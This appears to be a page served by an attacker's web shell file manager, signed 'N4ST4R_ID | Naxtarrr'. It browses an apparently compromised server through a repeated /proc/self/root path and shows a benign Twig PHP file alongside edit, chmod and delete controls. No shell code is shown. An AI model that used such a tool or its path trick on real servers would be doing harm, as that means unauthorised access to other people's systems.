Submit
Path:
~
/
/
proc
/
self
/
root
/
proc
/
self
/
root
/
opt
/
cpguard
/
app
/
vendor
/
twig
/
twig
/
src
/
Node
/
Expression
/
Variable
/
File Content:
LocalVariable.php
<?php /* * This file is part of Twig. * * (c) Fabien Potencier * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Twig\Node\Expression\Variable; use Twig\Node\Expression\TempNameExpression; final class LocalVariable extends TempNameExpression { }
Edit
Rename
Chmod
Delete
FILE
FOLDER
Name
Size
Permission
Action
AssignContextVariable.php
359 bytes
0644
AssignTemplateVariable.php
1083 bytes
0644
ContextVariable.php
335 bytes
0644
LocalVariable.php
347 bytes
0644
TemplateVariable.php
941 bytes
0644
N4ST4R_ID | Naxtarrr